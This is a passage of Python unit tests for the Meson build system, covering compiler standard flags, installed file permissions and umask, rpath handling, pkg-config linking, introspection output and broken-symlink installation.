                               msg='C compiler should have failed with -std=FAIL'):
            self.init(testdir, override_envvars = env)
            # ICC won't fail in the above because additional flags are needed to
            # make unknown -std=... options errors.
            self.build()

    def test_compiler_c_stds(self):
        '''
        Test that C stds specified for this compiler can all be used. Can't be
        an ordinary test because it requires passing options to meson.
        '''
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        self._test_stds_impl(testdir, cc)

    def test_compiler_cpp_stds(self):
        '''
        Test that C++ stds specified for this compiler can all be used. Can't
        be an ordinary test because it requires passing options to meson.
        '''
        testdir = os.path.join(self.common_test_dir, '2 cpp')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cpp = env.detect_cpp_compiler(MachineChoice.HOST)
        self._test_stds_impl(testdir, cpp)

    def test_unity_subproj(self):
        testdir = os.path.join(self.common_test_dir, '43 subproject')
        self.init(testdir, extra_args='--unity=subprojects')
        # Only the subproject targets get unity sources; the main project's
        # user-unity.c must not exist.
        pdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/simpletest*.p'))
        self.assertEqual(len(pdirs), 1)
        self.assertPathExists(os.path.join(pdirs[0], 'simpletest-unity0.c'))
        sdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/*sublib*.p'))
        self.assertEqual(len(sdirs), 1)
        self.assertPathExists(os.path.join(sdirs[0], 'sublib-unity0.c'))
        self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
        self.build()

    def test_installed_modes(self):
        '''
        Test that files installed by these tests have the correct permissions.
        Can't be an ordinary test because our installed_files.txt is very basic.
''' # Test file modes testdir = os.path.join(self.common_test_dir, '12 data') self.init(testdir) self.install() f = os.path.join(self.installdir, 'etc', 'etcfile.dat') found_mode = stat.filemode(os.stat(f).st_mode) want_mode = 'rw------T' self.assertEqual(want_mode, found_mode[1:]) f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh') statf = os.stat(f) found_mode = stat.filemode(statf.st_mode) want_mode = 'rwxr-sr-x' self.assertEqual(want_mode, found_mode[1:]) if os.getuid() == 0: # The chown failed nonfatally if we're not root self.assertEqual(0, statf.st_uid) self.assertEqual(0, statf.st_gid) f = os.path.join(self.installdir, 'usr', 'share', 'progname', 'fileobject_datafile.dat') orig = os.path.join(testdir, 'fileobject_datafile.dat') statf = os.stat(f) statorig = os.stat(orig) found_mode = stat.filemode(statf.st_mode) orig_mode = stat.filemode(statorig.st_mode) self.assertEqual(orig_mode[1:], found_mode[1:]) self.assertEqual(os.getuid(), statf.st_uid) if os.getuid() == 0: # The chown failed nonfatally if we're not root self.assertEqual(0, statf.st_gid) self.wipe() # Test directory modes testdir = os.path.join(self.common_test_dir, '60 install subdir') self.init(testdir) self.install() f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat') statf = os.stat(f) found_mode = stat.filemode(statf.st_mode) want_mode = 'rwxr-x--t' self.assertEqual(want_mode, found_mode[1:]) if os.getuid() == 0: # The chown failed nonfatally if we're not root self.assertEqual(0, statf.st_uid) def test_installed_modes_extended(self): ''' Test that files are installed with correct permissions using install_mode. 
''' testdir = os.path.join(self.common_test_dir, '191 install_mode') self.init(testdir) self.build() self.install() for fsobj, want_mode in [ ('bin', 'drwxr-x---'), ('bin/runscript.sh', '-rwxr-sr-x'), ('bin/trivialprog', '-rwxr-sr-x'), ('include', 'drwxr-x---'), ('include/config.h', '-rw-rwSr--'), ('include/rootdir.h', '-r--r--r-T'), ('lib', 'drwxr-x---'), ('lib/libstat.a', '-rw---Sr--'), ('share', 'drwxr-x---'), ('share/man', 'drwxr-x---'), ('share/man/man1', 'drwxr-x---'), ('share/man/man1/foo.1', '-r--r--r-T'), ('share/sub1', 'drwxr-x---'), ('share/sub1/second.dat', '-rwxr-x--t'), ('subdir', 'drwxr-x---'), ('subdir/data.dat', '-rw-rwSr--'), ]: f = os.path.join(self.installdir, 'usr', *fsobj.split('/')) found_mode = stat.filemode(os.stat(f).st_mode) self.assertEqual(want_mode, found_mode, msg=('Expected file %s to have mode %s but found %s instead.' % (fsobj, want_mode, found_mode))) # Ensure that introspect --installed works on all types of files # FIXME: also verify the files list self.introspect('--installed') def test_install_umask(self): ''' Test that files are installed with correct permissions using default install umask of 022, regardless of the umask at time the worktree was checked out or the build was executed. ''' # Copy source tree to a temporary directory and change permissions # there to simulate a checkout with umask 002. orig_testdir = os.path.join(self.unit_test_dir, '26 install umask') # Create a new testdir under tmpdir. tmpdir = os.path.realpath(tempfile.mkdtemp()) self.addCleanup(windows_proof_rmtree, tmpdir) testdir = os.path.join(tmpdir, '26 install umask') # Copy the tree using shutil.copyfile, which will use the current umask # instead of preserving permissions of the old tree. save_umask = os.umask(0o002) self.addCleanup(os.umask, save_umask) shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile) # Preserve the executable status of subdir/sayhello though. 
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775) self.init(testdir) # Run the build under a 027 umask now. os.umask(0o027) self.build() # And keep umask 027 for the install step too. self.install() for executable in [ 'bin/prog', 'share/subdir/sayhello', ]: f = os.path.join(self.installdir, 'usr', *executable.split('/')) found_mode = stat.filemode(os.stat(f).st_mode) want_mode = '-rwxr-xr-x' self.assertEqual(want_mode, found_mode, msg=('Expected file %s to have mode %s but found %s instead.' % (executable, want_mode, found_mode))) for directory in [ 'usr', 'usr/bin', 'usr/include', 'usr/share', 'usr/share/man', 'usr/share/man/man1', 'usr/share/subdir', ]: f = os.path.join(self.installdir, *directory.split('/')) found_mode = stat.filemode(os.stat(f).st_mode) want_mode = 'drwxr-xr-x' self.assertEqual(want_mode, found_mode, msg=('Expected directory %s to have mode %s but found %s instead.' % (directory, want_mode, found_mode))) for datafile in [ 'include/sample.h', 'share/datafile.cat', 'share/file.dat', 'share/man/man1/prog.1', 'share/subdir/datafile.dog', ]: f = os.path.join(self.installdir, 'usr', *datafile.split('/')) found_mode = stat.filemode(os.stat(f).st_mode) want_mode = '-rw-r--r--' self.assertEqual(want_mode, found_mode, msg=('Expected file %s to have mode %s but found %s instead.' % (datafile, want_mode, found_mode))) def test_cpp_std_override(self): testdir = os.path.join(self.unit_test_dir, '6 std override') self.init(testdir) compdb = self.get_compdb() # Don't try to use -std=c++03 as a check for the # presence of a compiler flag, as ICC does not # support it. 
for i in compdb: if 'prog98' in i['file']: c98_comp = i['command'] if 'prog11' in i['file']: c11_comp = i['command'] if 'progp' in i['file']: plain_comp = i['command'] self.assertNotEqual(len(plain_comp), 0) self.assertIn('-std=c++98', c98_comp) self.assertNotIn('-std=c++11', c98_comp) self.assertIn('-std=c++11', c11_comp) self.assertNotIn('-std=c++98', c11_comp) self.assertNotIn('-std=c++98', plain_comp) self.assertNotIn('-std=c++11', plain_comp) # Now werror self.assertIn('-Werror', plain_comp) self.assertNotIn('-Werror', c98_comp) def test_run_installed(self): if is_cygwin() or is_osx(): raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable') testdir = os.path.join(self.unit_test_dir, '7 run installed') self.init(testdir) self.build() self.install() installed_exe = os.path.join(self.installdir, 'usr/bin/prog') installed_libdir = os.path.join(self.installdir, 'usr/foo') installed_lib = os.path.join(installed_libdir, 'libfoo.so') self.assertTrue(os.path.isfile(installed_exe)) self.assertTrue(os.path.isdir(installed_libdir)) self.assertTrue(os.path.isfile(installed_lib)) # Must fail when run without LD_LIBRARY_PATH to ensure that # rpath has been properly stripped rather than pointing to the builddir. self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0) # When LD_LIBRARY_PATH is set it should start working. # For some reason setting LD_LIBRARY_PATH in os.environ fails # when all tests are run (but works when only this test is run), # but doing this explicitly works. 
env = os.environ.copy() env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')]) self.assertEqual(subprocess.call(installed_exe, env=env), 0) # Ensure that introspect --installed works installed = self.introspect('--installed') for v in installed.values(): self.assertTrue('prog' in v or 'foo' in v) @skipIfNoPkgconfig def test_order_of_l_arguments(self): testdir = os.path.join(self.unit_test_dir, '8 -L -l order') self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir}) # NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders # the flags before returning them to -Lfoo -Lbar -lfoo -lbar # but pkgconf seems to not do that. Sigh. Support both. expected_order = [('-L/me/first', '-lfoo1'), ('-L/me/second', '-lfoo2'), ('-L/me/first', '-L/me/second'), ('-lfoo1', '-lfoo2'), ('-L/me/second', '-L/me/third'), ('-L/me/third', '-L/me/fourth',), ('-L/me/third', '-lfoo3'), ('-L/me/fourth', '-lfoo4'), ('-lfoo3', '-lfoo4'), ] with open(os.path.join(self.builddir, 'build.ninja')) as ifile: for line in ifile: if expected_order[0][0] in line: for first, second in expected_order: self.assertLess(line.index(first), line.index(second)) return raise RuntimeError('Linker entries not found in the Ninja file.') def test_introspect_dependencies(self): ''' Tests that mesonintrospect --dependencies returns expected output. 
''' testdir = os.path.join(self.framework_test_dir, '7 gnome') self.init(testdir) glib_found = False gobject_found = False deps = self.introspect('--dependencies') self.assertIsInstance(deps, list) for dep in deps: self.assertIsInstance(dep, dict) self.assertIn('name', dep) self.assertIn('compile_args', dep) self.assertIn('link_args', dep) if dep['name'] == 'glib-2.0': glib_found = True elif dep['name'] == 'gobject-2.0': gobject_found = True self.assertTrue(glib_found) self.assertTrue(gobject_found) if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0: raise unittest.SkipTest('glib >= 2.56.2 needed for the rest') targets = self.introspect('--targets') docbook_target = None for t in targets: if t['name'] == 'generated-gdbus-docbook': docbook_target = t break self.assertIsInstance(docbook_target, dict) self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0])) def test_introspect_installed(self): testdir = os.path.join(self.linuxlike_test_dir, '7 library versions') self.init(testdir) install = self.introspect('--installed') install = {os.path.basename(k): v for k, v in install.items()} print(install) if is_osx(): the_truth = { 'libmodule.dylib': '/usr/lib/libmodule.dylib', 'libnoversion.dylib': '/usr/lib/libnoversion.dylib', 'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib', 'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib', 'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib', 'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib', 'libsome.0.dylib': '/usr/lib/libsome.0.dylib', 'libsome.dylib': '/usr/lib/libsome.dylib', } the_truth_2 = {'/usr/lib/libsome.dylib', '/usr/lib/libsome.0.dylib', } else: the_truth = { 'libmodule.so': '/usr/lib/libmodule.so', 'libnoversion.so': '/usr/lib/libnoversion.so', 'libonlysoversion.so': '/usr/lib/libonlysoversion.so', 'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5', 'libonlyversion.so': 
'/usr/lib/libonlyversion.so', 'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1', 'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5', 'libsome.so': '/usr/lib/libsome.so', 'libsome.so.0': '/usr/lib/libsome.so.0', 'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3', } the_truth_2 = {'/usr/lib/libsome.so', '/usr/lib/libsome.so.0', '/usr/lib/libsome.so.1.2.3'} self.assertDictEqual(install, the_truth) targets = self.introspect('--targets') for t in targets: if t['name'] != 'some': continue self.assertSetEqual(the_truth_2, set(t['install_filename'])) def test_build_rpath(self): if is_cygwin(): raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH') testdir = os.path.join(self.unit_test_dir, '10 build_rpath') self.init(testdir) self.build() # C program RPATH build_rpath = get_rpath(os.path.join(self.builddir, 'prog')) self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar') self.install() install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog')) self.assertEqual(install_rpath, '/baz') # C++ program RPATH build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx')) self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar') self.install() install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx')) self.assertEqual(install_rpath, 'baz') def test_global_rpath(self): if is_cygwin(): raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH') if is_osx(): raise unittest.SkipTest('Global RPATHs via LDFLAGS not yet supported on MacOS (does anybody need it?)') testdir = os.path.join(self.unit_test_dir, '81 global-rpath') oldinstalldir = self.installdir # Build and install an external library without DESTDIR. # The external library generates a .pc file without an rpath. 
yonder_dir = os.path.join(testdir, 'yonder') yonder_prefix = os.path.join(oldinstalldir, 'yonder') yonder_libdir = os.path.join(yonder_prefix, self.libdir) self.prefix = yonder_prefix self.installdir = yonder_prefix self.init(yonder_dir) self.build() self.install(use_destdir=False) # Since rpath has multiple valid formats we need to # test that they are all properly used. rpath_formats = [ ('-Wl,-rpath=', False), ('-Wl,-rpath,', False), ('-Wl,--just-symbols=', True), ('-Wl,--just-symbols,', True), ('-Wl,-R', False), ('-Wl,-R,', False) ] for rpath_format, exception in rpath_formats: # Build an app that uses that installed library. # Supply the rpath to the installed library via LDFLAGS # (as systems like buildroot and guix are wont to do) # and verify install preserves that rpath. self.new_builddir() env = {'LDFLAGS': rpath_format + yonder_libdir, 'PKG_CONFIG_PATH': os.path.join(yonder_libdir, 'pkgconfig')} if exception: with self.assertRaises(subprocess.CalledProcessError): self.init(testdir, override_envvars=env) continue self.init(testdir, override_envvars=env) self.build() self.install(use_destdir=False) got_rpath = get_rpath(os.path.join(yonder_prefix, 'bin/rpathified')) self.assertEqual(got_rpath, yonder_libdir, rpath_format) @skip_if_not_base_option('b_sanitize') def test_pch_with_address_sanitizer(self): if is_cygwin(): raise unittest.SkipTest('asan not available on Cygwin') if is_openbsd(): raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD') testdir = os.path.join(self.common_test_dir, '13 pch') self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false']) self.build() compdb = self.get_compdb() for i in compdb: self.assertIn("-fsanitize=address", i["command"]) def test_cross_find_program(self): testdir = os.path.join(self.unit_test_dir, '11 cross prog') crossfile = tempfile.NamedTemporaryFile(mode='w') print(os.path.join(testdir, 'some_cross_tool.py')) tool_path = os.path.join(testdir, 'some_cross_tool.py') 
crossfile.write(textwrap.dedent(f'''\ [binaries] c = '{shutil.which('gcc' if is_sunos() else 'cc')}' ar = '{shutil.which('ar')}' strip = '{shutil.which('strip')}' sometool.py = ['{tool_path}'] someothertool.py = '{tool_path}' [properties] [host_machine] system = 'linux' cpu_family = 'arm' cpu = 'armv7' # Not sure if correct. endian = 'little' ''')) crossfile.flush() self.meson_cross_file = crossfile.name self.init(testdir) def test_reconfigure(self): testdir = os.path.join(self.unit_test_dir, '13 reconfigure') self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False) self.build('reconfigure') def test_vala_generated_source_buildir_inside_source_tree(self): ''' Test that valac outputs generated C files in the expected location when the builddir is a subdir of the source tree. ''' if not shutil.which('valac'): raise unittest.SkipTest('valac not installed.') testdir = os.path.join(self.vala_test_dir, '8 generated sources') newdir = os.path.join(self.builddir, 'srctree') shutil.copytree(testdir, newdir) testdir = newdir # New builddir builddir = os.path.join(testdir, 'subdir/_build') os.makedirs(builddir, exist_ok=True) self.change_builddir(builddir) self.init(testdir) self.build() def test_old_gnome_module_codepaths(self): ''' A lot of code in the GNOME module is conditional on the version of the glib tools that are installed, and breakages in the old code can slip by once the CI has a newer glib version. So we force the GNOME module to pretend that it's running on an ancient glib so the fallback code is also tested. 
''' testdir = os.path.join(self.framework_test_dir, '7 gnome') mesonbuild.modules.gnome.native_glib_version = '2.20' env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"} try: self.init(testdir, inprocess=True, override_envvars=env) self.build(override_envvars=env) finally: mesonbuild.modules.gnome.native_glib_version = None @skipIfNoPkgconfig def test_pkgconfig_usage(self): testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency') testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee') if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) != 0: raise unittest.SkipTest('Glib 2.0 dependency not available.') with tempfile.TemporaryDirectory() as tempdirname: self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False) self.install(use_destdir=False) shutil.rmtree(self.builddir) os.mkdir(self.builddir) pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig') self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc'))) lib_dir = os.path.join(tempdirname, 'lib') myenv = os.environ.copy() myenv['PKG_CONFIG_PATH'] = pkg_dir # Private internal libraries must not leak out. pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv) self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.') # Dependencies must not leak to cflags when building only a shared library. pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv) self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.') # Test that the result is usable. 
self.init(testdir2, override_envvars=myenv) self.build(override_envvars=myenv) myenv = os.environ.copy() myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')]) if is_cygwin(): bin_dir = os.path.join(tempdirname, 'bin') myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH'] self.assertTrue(os.path.isdir(lib_dir)) test_exe = os.path.join(self.builddir, 'pkguser') self.assertTrue(os.path.isfile(test_exe)) subprocess.check_call(test_exe, env=myenv) @skipIfNoPkgconfig def test_pkgconfig_relative_paths(self): testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths') pkg_dir = os.path.join(testdir, 'pkgconfig') self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc'))) env = get_fake_env(testdir, self.builddir, self.prefix) env.coredata.set_options({OptionKey('pkg_config_path'): pkg_dir}, subproject='') kwargs = {'required': True, 'silent': True} relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs) self.assertTrue(relative_path_dep.found()) # Ensure link_args are properly quoted libpath = Path(self.builddir) / '../relativepath/lib' link_args = ['-L' + libpath.as_posix(), '-lrelativepath'] self.assertEqual(relative_path_dep.get_link_args(), link_args) @skipIfNoPkgconfig def test_pkgconfig_internal_libraries(self): ''' ''' with tempfile.TemporaryDirectory() as tempdirname: # build library testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries') testdirlib = os.path.join(testdirbase, 'lib') self.init(testdirlib, extra_args=['--prefix=' + tempdirname, '--libdir=lib', '--default-library=static'], default_args=False) self.build() self.install(use_destdir=False) # build user of library pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig') self.new_builddir() self.init(os.path.join(testdirbase, 'app'), override_envvars={'PKG_CONFIG_PATH': pkg_dir}) self.build() @skipIfNoPkgconfig def test_static_archive_stripping(self): ''' Check that Meson produces valid static archives with --strip 
enabled ''' with tempfile.TemporaryDirectory() as tempdirname: testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping') # build lib self.new_builddir() testdirlib = os.path.join(testdirbase, 'lib') testlibprefix = os.path.join(tempdirname, 'libprefix') self.init(testdirlib, extra_args=['--prefix=' + testlibprefix, '--libdir=lib', '--default-library=static', '--buildtype=debug', '--strip'], default_args=False) self.build() self.install(use_destdir=False) # build executable (uses lib, fails if static archive has been stripped incorrectly) pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig') self.new_builddir() self.init(os.path.join(testdirbase, 'app'), override_envvars={'PKG_CONFIG_PATH': pkg_dir}) self.build() @skipIfNoPkgconfig def test_pkgconfig_formatting(self): testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format') self.init(testdir) myenv = os.environ.copy() myenv['PKG_CONFIG_PATH'] = self.privatedir stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv) deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething'] if is_windows() or is_cygwin() or is_osx() or is_openbsd(): # On Windows, libintl is a separate library deps.append(b'-lintl') self.assertEqual(set(deps), set(stdo.split())) @skipIfNoPkgconfig @skip_if_not_language('cs') def test_pkgconfig_csharp_library(self): testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library') self.init(testdir) myenv = os.environ.copy() myenv['PKG_CONFIG_PATH'] = self.privatedir stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv) self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip()) @skipIfNoPkgconfig def test_pkgconfig_link_order(self): ''' Test that libraries are listed before their dependencies. 
''' testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order') self.init(testdir) myenv = os.environ.copy() myenv['PKG_CONFIG_PATH'] = self.privatedir stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv) deps = stdo.split() self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency')) def test_deterministic_dep_order(self): ''' Test that the dependencies are always listed in a deterministic order. ''' testdir = os.path.join(self.unit_test_dir, '43 dep order') self.init(testdir) with open(os.path.join(self.builddir, 'build.ninja')) as bfile: for line in bfile: if 'build myexe:' in line or 'build myexe.exe:' in line: self.assertIn('liblib1.a liblib2.a', line) return raise RuntimeError('Could not find the build rule') def test_deterministic_rpath_order(self): ''' Test that the rpaths are always listed in a deterministic order. ''' if is_cygwin(): raise unittest.SkipTest('rpath are not used on Cygwin') testdir = os.path.join(self.unit_test_dir, '42 rpath order') self.init(testdir) if is_osx(): rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2') else: rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2') with open(os.path.join(self.builddir, 'build.ninja')) as bfile: for line in bfile: if '-rpath' in line: self.assertRegex(line, rpathre) return raise RuntimeError('Could not find the rpath') def test_override_with_exe_dep(self): ''' Test that we produce the correct dependencies when a program is overridden with an executable. 
''' testdir = os.path.join(self.src_root, 'test cases', 'native', '9 override with exe') self.init(testdir) with open(os.path.join(self.builddir, 'build.ninja')) as bfile: for line in bfile: if 'main1.c:' in line or 'main2.c:' in line: self.assertIn('| subprojects/sub/foobar', line) @skipIfNoPkgconfig def test_usage_external_library(self): ''' Test that uninstalled usage of an external library (from the system or PkgConfigDependency) works. On macOS, this workflow works out of the box. On Linux, BSDs, Windows, etc, you need to set extra arguments such as LD_LIBRARY_PATH, etc, so this test is skipped. The system library is found with cc.find_library() and pkg-config deps. ''' oldprefix = self.prefix # Install external library so we can find it testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library') # install into installdir without using DESTDIR installdir = self.installdir self.prefix = installdir self.init(testdir) self.prefix = oldprefix self.build() self.install(use_destdir=False) ## New builddir for the consumer self.new_builddir() env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir), 'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')} testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library') # install into installdir without using DESTDIR self.prefix = self.installdir self.init(testdir, override_envvars=env) self.prefix = oldprefix self.build(override_envvars=env) # test uninstalled self.run_tests(override_envvars=env) if not (is_osx() or is_linux()): return # test running after installation self.install(use_destdir=False) prog = os.path.join(self.installdir, 'bin', 'prog') self._run([prog]) if not is_osx(): # Rest of the workflow only works on macOS return out = self._run(['otool', '-L', prog]) self.assertNotIn('@rpath', out) ## New builddir for testing that DESTDIR is not added to install_name self.new_builddir() # install into installdir with 
DESTDIR self.init(testdir, override_envvars=env) self.build(override_envvars=env) # test running after installation self.install(override_envvars=env) prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog') lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib') for f in prog, lib: out = self._run(['otool', '-L', f]) # Ensure that the otool output does not contain self.installdir self.assertNotRegex(out, self.installdir + '.*dylib ') @skipIfNoPkgconfig def test_usage_pkgconfig_prefixes(self): ''' Build and install two external libraries, to different prefixes, then build and install a client program that finds them via pkgconfig, and verify the installed client program runs. ''' oldinstalldir = self.installdir # Build and install both external libraries without DESTDIR val1dir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'val1') val1prefix = os.path.join(oldinstalldir, 'val1') self.prefix = val1prefix self.installdir = val1prefix self.init(val1dir) self.build() self.install(use_destdir=False) self.new_builddir() env1 = {} env1['PKG_CONFIG_PATH'] = os.path.join(val1prefix, self.libdir, 'pkgconfig') val2dir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'val2') val2prefix = os.path.join(oldinstalldir, 'val2') self.prefix = val2prefix self.installdir = val2prefix self.init(val2dir, override_envvars=env1) self.build() self.install(use_destdir=False) self.new_builddir() # Build, install, and run the client program env2 = {} env2['PKG_CONFIG_PATH'] = os.path.join(val2prefix, self.libdir, 'pkgconfig') testdir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'client') testprefix = os.path.join(oldinstalldir, 'client') self.prefix = testprefix self.installdir = testprefix self.init(testdir, override_envvars=env2) self.build() self.install(use_destdir=False) prog = os.path.join(self.installdir, 'bin', 'client') env3 = {} if is_cygwin(): env3['PATH'] = os.path.join(val1prefix, 'bin') + \ os.pathsep + \ 
os.path.join(val2prefix, 'bin') + \
                       os.pathsep + os.environ['PATH']
        out = self._run([prog], override_envvars=env3).strip()
        # Expected output is val1 + val2 = 3
        self.assertEqual(out, '3')

    def install_subdir_invalid_symlinks(self, testdir, subdir_path):
        '''
        Test that installation of broken symlinks works fine.
        https://github.com/mesonbuild/meson/issues/3914
        '''
        testdir = os.path.join(self.common_test_dir, testdir)
        subdir = os.path.join(testdir, subdir_path)
        with chdir(subdir):
            # Can't distribute broken symlinks in the source tree because it breaks
            # the creation of zipapps. Create it dynamically and run the test by
            # hand.
            src = '../../nonexistent.txt'
            os.symlink(src, 'invalid-symlink.txt')
            try:
                self.init(testdir)
                self.build()
                self.install()
                install_path = subdir_path.split(os.path.sep)[-1]
                link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
                # The broken link must be installed as a link pointing at the
                # same (nonexistent) target, not followed or dropped.
                self.assertTrue(os.path.islink(link), msg=link)
                self.assertEqual(src, os.readlink(link))
                self.assertFalse(os.path.isfile(link), msg=link)
            finally:
                # Always remove the dynamically created symlink from the source tree.
                os.remove(os.path.join(subdir, 'invalid-symlink.txt'))

    def test_install_subdir_symlinks(self):
        self.install_subdir_invalid_symlinks('60 install subdir', os.path.join('sub', 'sub1'))

    def test_install_subdir_symlinks_with_default_umask(self):
        self.install_subdir_invalid_symlinks('191 install_mode', 'sub2')

    def test_install_subdir_symlinks_with_default_umask_and_mode(self):
        self.install_subdir_invalid_symlinks('191 install_mode', 'sub1')

    @skipIfNoPkgconfigDep('gmodule-2.0')
    def test_ldflag_dedup(self):
        # -Wl,--export-dynamic must appear exactly once on any build.ninja
        # line: deduplication must not drop it entirely nor leave duplicates.
        testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
        if is_cygwin() or is_osx():
            raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
        env = get_fake_env()
        cc = env.detect_c_compiler(MachineChoice.HOST)
        linker = cc.linker
        if not linker.export_dynamic_args(env):
            raise unittest.SkipTest('Not applicable for linkers without --export-dynamic')
        self.init(testdir)
        build_ninja = os.path.join(self.builddir, 'build.ninja')
        max_count = 0
        search_term = '-Wl,--export-dynamic'
        with open(build_ninja, 'r', encoding='utf-8') as f:
            for line in f:
                max_count = max(max_count, line.count(search_term))
        self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')

    def test_compiler_libs_static_dedup(self):
        testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
        self.init(testdir)
        build_ninja = os.path.join(self.builddir, 'build.ninja')
        with open(build_ninja, 'r', encoding='utf-8') as f:
            lines = f.readlines()
        for lib in ('-ldl', '-lm', '-lc', '-lrt'):
            for line in lines:
                if lib not in line:
                    continue
                # Assert that the library flag occurs exactly once on the line
                # (splitting on it yields exactly two pieces).
                self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))

    @skipIfNoPkgconfig
    def test_noncross_options(self):
        # C_std defined in project options must be in effect also when native compiling.
        testdir = os.path.join(self.unit_test_dir, '51 noncross options')
        self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
        compdb = self.get_compdb()
        self.assertEqual(len(compdb), 2)
        self.assertRegex(compdb[0]['command'], '-std=c99')
        self.assertRegex(compdb[1]['command'], '-std=c99')
        self.build()

    def test_identity_cross(self):
        # Build and host compilers are both wrapper scripts supplied via a
        # native file and a cross file; configuring must still succeed.
        testdir = os.path.join(self.unit_test_dir, '61 identity cross')

        nativefile = tempfile.NamedTemporaryFile(mode='w')
        nativefile.write(textwrap.dedent('''\
            [binaries]
            c = ['{0}']
            '''.format(os.path.join(testdir, 'build_wrapper.py'))))
        nativefile.flush()
        self.meson_native_file = nativefile.name

        crossfile = tempfile.NamedTemporaryFile(mode='w')
        crossfile.write(textwrap.dedent('''\
            [binaries]
            c = ['{0}']
            '''.format(os.path.join(testdir, 'host_wrapper.py'))))
        crossfile.flush()
        self.meson_cross_file = crossfile.name

        # TODO should someday be explicit about build platform only here
        self.init(testdir)

    def test_identity_cross_env(self):
        # Same as test_identity_cross, but the build-machine compiler is
        # supplied through the CC_FOR_BUILD environment variable instead of
        # a native file.
        testdir = os.path.join(self.unit_test_dir, '61 identity cross')
        env = {
